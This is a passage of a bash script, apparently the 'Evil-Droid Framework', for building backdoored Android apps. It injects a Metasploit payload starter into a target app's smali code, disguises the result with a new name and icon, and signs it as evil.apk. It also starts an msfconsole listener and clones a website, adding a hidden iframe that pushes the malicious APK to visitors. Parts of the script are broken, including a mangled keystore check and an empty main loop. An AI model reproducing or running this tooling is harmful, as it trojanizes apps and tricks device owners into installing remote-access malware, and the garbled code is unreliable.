echo "inject Smali: $android_targetActivity.smali" |awk -F ":/" '{ print $NF }'
hook_num=
grep -n " return-void" $path/original/smali/$android_targetActivity.smali 2>&1| cut -d ";" -f 1 |awk -F ":" 'NR==1{ print $1 }'
2>&1echo "In line:$hook_num"
echo "##################################################################"
starter=" invoke-static {}, L$android_nam/$VAR1/$VAR3;->start()V"
sed -i "${hook_num}i\ ${starter}" $path/original/smali/$android_targetActivity.smali > /dev/null 2>&1
fi
fi
}
function chage name and icon
function merge_name_ico()
{
echo -e $yellow ""
echo "[] Changing name and icon payload..."
spinlong
label=' '
label1=' '
sed -i "s|$label|$label1|g" $path/payload/AndroidManifest.xml 2>&1
sed -i "s|MainActivity|$apk_name|g" $path/payload/res/values/strings.xml 2>&1
mkdir $path/payload/res/drawable
cp $iconos $path/payload/res/drawable/main_icon.png
}
#function signing apk
function sign()
{
echo -e $yellow ""
echo "[] Checking for ~/.android/debug.keystore for signing..."
spinlong
if [ ! -f
/.android/debug.keystore ]; then/.android" ]; thenecho -e $red ""
echo " [ X ] Debug key not found. Generating one now..."
spinlong
if [ ! -d "
mkdir ~/.android > /dev/null 2>&1
fi
echo -e $lightgreen ""
keytool -genkey -v -keystore ~/.android/debug.keystore -storepass android -alias androiddebugkey -keypass android -keyalg RSA -keysize 2048 -validity 10000
fi
spinlong
echo -e $yellow ""
echo "[] Attempting to sign the package with your android debug key"
spinlong
jarsigner -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA evil.apk androiddebugkey > /dev/null 2>&1
echo -e $yellow
echo "[] Verifying signed artifacts..."
spinlong
jarsigner -verify -certs evil.apk > /dev/null 2>&1
rc=$?
if [ $rc != 0 ]; then
echo -e $red ""
echo "[!] Failed to verify signed artifacts"
apache_svc_stop
postgresql_stop
exit $rc
fi
echo -e $yellow
echo "[] Aligning recompiled APK..."
spinlong
zipalign 4 evil.apk $apk_name.apk 2>&1
rc=$?
echo -e $yellow
echo "[✔] Done."
spinlong
if [ $rc != 0 ]; then
echo -e $red ""
echo "[!] Failed to align recompiled APK"
apache_svc_stop
postgresql_stop
exit $rc
fi
rm evil.apk > /dev/null 2>&1
}
#function ask
function quests()
{
while true; do
echo ""
quest=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose payload apk or original apk?" --radiolist --column "Choose" --column "Option" TRUE "APK-MSF" FALSE "ORIGINAL-APK" --width 305 --height 270 2> /dev/null)
case $quest in
APK-MSF) change_icon;spinlong;gen_payload;spinlong;apk_decomp;flagg;merge_name_ico;spinlong;apk_comp;spinlong;sign;return;;
ORIGINAL-APK) orig_apk;spinlong;gen_payload;spinlong;up_apktook;apk_decomp1;spinlong;apk_decomp;flagg_original;spinlong;apk_comp1;spinlong;sign;return;;
esac
done
}
#function listeners
function listener()
{
xterm -T "EVIL-DROID MULTI/HANDLER" -fa monaco -fs 10 -bg black -e "msfconsole -x 'use multi/handler; set LHOST $lanip; set LPORT $LPORT; set PAYLOAD $PAYLOAD; exploit'"
}
#function clone site
function clns()
{
clone=$(zenity --title "☢ CLONE WEBSITE ☢" --text "PASTE LINK WEBSITE TO CLONE" --entry --width 400 2> /dev/null)
}
function index_name()
{
index=$(zenity --title "☢ INDEX NAME ☢" --text "example: wtf.html" --entry --entry-text "wtf" --width 300 2> /dev/null)
echo -e $yellow ""
echo "[] Clone Website From URL..."
spinlong
wget $clone --no-check-certificate -O $index.html -c -k -U "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0" > /dev/null 2>&1
}
function launcher()
{
echo '<iframe id="frame" src="evil.apk" application="yes" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no>></iframe><script type="text/javascript">setTimeout(function(){window.location.href="http://local-ip";}, 15000);</script>' | sed "s|evil.apk|$apk_name.apk|" | sed "s|local-ip|$LHOST/$index.html|" >> apk_index
com=
cat apk_index
rep=""
sed "s|$rep|$com|" $index.html > index2.html
mv index2.html /var/www/html/$index.html > /dev/null 2>&1
cp $path/evilapk/$apk_name.apk /var/www/html > /dev/null 2>&1
rm apk_index > /dev/null 2>&1
rm $index.html > /dev/null 2>&1
zenity --title "☢ SITE CLONED ☢" --info --text "http://$LHOST/$index.html" --width 400 > /dev/null 2>&1
}
#function attack verctor
function atkv()
{
while true; do
echo ""
atk_v=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Choose an option bellow:" --radiolist --column "Choose" --column "Option" TRUE "Multi-Handler" FALSE "Attack-Vector" FALSE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null)
case $atk_v in
Multi-Handler) listener;suite;;
Attack-Vector) clns;spinlong;index_name;launcher;listener;suite;;
Main-Menu) clear;main;;
Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
esac
done
}
#function suite
function suite()
{
while true; do
echo ""
suit=$(zenity --list --title "☢ EVIL-DROID OPTIONS ☢" --text "Would you like to continue?" --radiolist --column "Choose" --column "Option" TRUE "Main-Menu" FALSE "Exit" --width 305 --height 270 2> /dev/null)
case $suit in
Main-Menu) clear;main;;
Exit) echo -e $yellow "";apache_svc_stop;postgresql_stop;echo " Good Bye !!";echo "";exit;;
esac
done
}
#function clean files
function clean()
{
rm $directory/* > /dev/null 2>&1
rm $path/.jpeg > /dev/null 2>&1
rm $path/.txt > /dev/null 2>&1
rm /var/www/html/*.apk > /dev/null 2>&1
rm /var/www/html/$index.html > /dev/null 2>&1
}
start=$(zenity --question --title="☢ Evil-Droid Framework ☢" --text "Execute framework and Services?" --width 270 2> /dev/null)
if [ "$?" -eq "0" ]; then
apache_svc_start
postgresql_start
else
clear
echo ""
echo -e $lightgreen "╔──────────────────────────────────────────────╗"
echo -e $lightgreen "| Author: Mascerano Bachir |"
echo -e $lightgreen "| Evil-Droid Framework $ver - Dev-labs.co |"
echo -e $lightgreen "| Credits to : MrPedroubuntu , Kader Achraf |"
echo -e $lightgreen "| , youcef yahia |"
echo -e $lightgreen "| and Mohammed Yacine |"
echo -e $lightgreen "┖──────────────────────────────────────────────┙"
echo ""
apache_svc_stop
postgresql_stop
exit
fi
clear
#main menu
function main()
{
while :
do
}
main